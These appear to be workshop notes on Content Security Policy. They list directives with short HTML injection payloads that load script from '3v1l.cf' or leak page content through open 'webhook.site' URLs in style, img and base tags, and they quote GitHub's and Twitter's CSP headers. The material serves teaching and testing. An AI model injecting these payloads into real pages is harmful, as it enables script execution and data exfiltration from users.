# What is CSP

Header: `Content-Security-Policy: default-src ...`
Meta-tag: `<meta http-equiv=content-security-policy content="default-src ...">`

[https://content-security-policy.com/](https://content-security-policy.com/)

[https://cspws.ga/1-what-is.php](https://cspws.ga/1-what-is.php)

[https://webhook.site/](https://webhook.site/)

1. default-src
2. script-src
	
	```
	<script src=//3v1l.cf/1.js></script>
	```
	
3. style-src

	```
	<style>
	@import url('//webhook.site/<id>?
	```
	
4. img-src

	```
	<img src='//webhook.site/<id>?
	```
	
5. connect-src

	```
	<script>
	function reqListener () {
	  alert(this.responseText);
	}
	
	var o = new XMLHttpRequest();
	o.addEventListener("load", reqListener);
	o.open("GET", "//3v1l.cf/cors.php");
	o.send();
	
	</script>
	```
	
6. font-src

	```
	...
	```
	
7. media-src
8. child-src
9. form-action
10. base-uri

	```
	<base href="//3v1l.cf"> <a href="test
	```
	
11. report-uri

## CSP 3.0

Adds disown-opener, manifest-src, navigate-to, report-to, ** strict-dynamic **, worker-src. Undeprecates frame-src. Deprecates report-uri in favor if report-to.

Validation: [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com/).

Github:

```
Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; connect-src 'self' uploads.github.com status.github.com collector.githubapp.com api.github.com www.google-analytics.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com wss://live.github.com; font-src assets-cdn.github.com; form-action 'self' github.com gist.github.com; frame-ancestors 'none'; frame-src render.githubusercontent.com; img-src 'self' data: assets-cdn.github.com identicons.github.com collector.githubapp.com github-cloud.s3.amazonaws.com *.githubusercontent.com; manifest-src 'self'; media-src 'none'; script-src assets-cdn.github.com; style-src 'unsafe-inline' assets-cdn.github.com
```

Twitter:

```
content-security-policy: script-src https://ssl.google-analytics.com https://twitter.com 'unsafe-eval' https://*.twimg.com https://api.twitter.com https://analytics.twitter.com https://publish.twitter.com https://ton.twitter.com https://syndication.twitter.com https://www.google.com https://platform.twitter.com 'nonce-OiEX//zKJkE1MuS6ODd0eQ==' https://www.google-analytics.com blob: 'self'; frame-ancestors 'self'; font-src https://twitter.com https://*.twimg.com data: https://ton.twitter.com 'self'; media-src https://rmpdhdsnappytv-vh.akamaihd.net https://prod-video-eu-central-1.pscp.tv https://prod-video-ap-south-1.pscp.tv https://v.cdn.vine.co https://dwo3ckksxlb0v.cloudfront.net https://twitter.com https://prod-video-us-east-2.pscp.tv https://prod-video-cn-north-1.pscp.tv https://amp.twimg.com https://smmdhdsnappytv-vh.akamaihd.net https://*.twimg.com https://prod-video-eu-west-1.pscp.tv https://*.video.pscp.tv https://rmmdhdsnappytv-vh.akamaihd.net https://clips-media-assets.twitch.tv https://prod-video-ap-northeast-2.pscp.tv https://prod-video-us-west-2.pscp.tv https://prod-video-us-west-1.pscp.tv https://prod-video-ap-northeast-1.pscp.tv https://smdhdsnappytv-vh.akamaihd.net https://ton.twitter.com https://prod-video-eu-west-3.pscp.tv https://rmdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://prod-video-ca-central-1.pscp.tv https://smpdhdsnappytv-vh.akamaihd.net https://prod-video-sa-east-1.pscp.tv https://mdhdsnappytv-vh.akamaihd.net https://prod-video-ap-southeast-2.pscp.tv https://mtc.cdn.vine.co https://prod-video-cn-northwest-1.pscp.tv https://prod-video-eu-west-2.pscp.tv https://canary-video-us-east-1.pscp.tv https://dev-video-us-west-2.pscp.tv https://prod-video-us-east-1.pscp.tv blob: 'self' https://prod-video-ap-northeast-3.pscp.tv https://prod-video-ap-southeast-1.pscp.tv https://mpdhdsnappytv-vh.akamaihd.net https://dev-video-eu-west-1.pscp.tv; connect-src https://rmpdhdsnappytv-vh.akamaihd.net https://prod-video-eu-central-1.pscp.tv https://prod-video-ap-south-1.pscp.tv https://*.giphy.com https://dwo3ckksxlb0v.cloudfront.net https://prod-video-us-east-2.pscp.tv https://prod-video-cn-north-1.pscp.tv https://vmaprel.snappytv.com https://smmdhdsnappytv-vh.akamaihd.net https://*.twimg.com https://embed.pscp.tv https://api.twitter.com https://prod-video-eu-west-1.pscp.tv https://*.video.pscp.tv https://rmmdhdsnappytv-vh.akamaihd.net https://clips-media-assets.twitch.tv https://prod-video-ap-northeast-2.pscp.tv https://prod-video-us-west-2.pscp.tv https://pay.twitter.com https://prod-video-us-west-1.pscp.tv https://analytics.twitter.com https://vmap.snappytv.com https://*.twprobe.net https://prod-video-ap-northeast-1.pscp.tv https://smdhdsnappytv-vh.akamaihd.net https://prod-video-eu-west-3.pscp.tv https://syndication.twitter.com https://sentry.io https://rmdhdsnappytv-vh.akamaihd.net https://media.riffsy.com https://mmdhdsnappytv-vh.akamaihd.net https://prod-video-ca-central-1.pscp.tv https://embed.periscope.tv https://smpdhdsnappytv-vh.akamaihd.net https://prod-video-sa-east-1.pscp.tv https://vmapstage.snappytv.com https://upload.twitter.com https://proxsee.pscp.tv https://mdhdsnappytv-vh.akamaihd.net https://prod-video-ap-southeast-2.pscp.tv https://prod-video-cn-northwest-1.pscp.tv https://prod-video-eu-west-2.pscp.tv https://canary-video-us-east-1.pscp.tv https://dev-video-us-west-2.pscp.tv https://prod-video-us-east-1.pscp.tv blob: 'self' https://prod-video-ap-northeast-3.pscp.tv https://vmap.grabyo.com https://prod-video-ap-southeast-1.pscp.tv https://mpdhdsnappytv-vh.akamaihd.net https://dev-video-eu-west-1.pscp.tv; style-src https://fonts.googleapis.com https://twitter.com https://*.twimg.com https://translate.googleapis.com https://ton.twitter.com 'unsafe-inline' https://platform.twitter.com 'self'; object-src https://twitter.com https://pbs.twimg.com; default-src 'self' blob:; frame-src https://twitter.com https://*.twimg.com https://player.vimeo.com https://pay.twitter.com https://ton.twitter.com https://syndication.twitter.com https://vine.co twitter: https://www.youtube.com https://platform.twitter.com https://upload.twitter.com 'self'; img-src https://*.giphy.com https://*.pscp.tv https://twitter.com https://*.twimg.com data: https://clips-media-assets.twitch.tv https://lumiere-a.akamaihd.net https://ton.twitter.com https://syndication.twitter.com https://media.riffsy.com https://www.google.com https://platform.twitter.com https://api.mapbox.com https://www.google-analytics.com blob: https://*.periscope.tv 'self'; report-uri https://twitter.com/i/csp_report?a=NVQWGYLXFVZXO2LGOQ%3D%3D%3D%3D%3D%3D&ro=false;
```

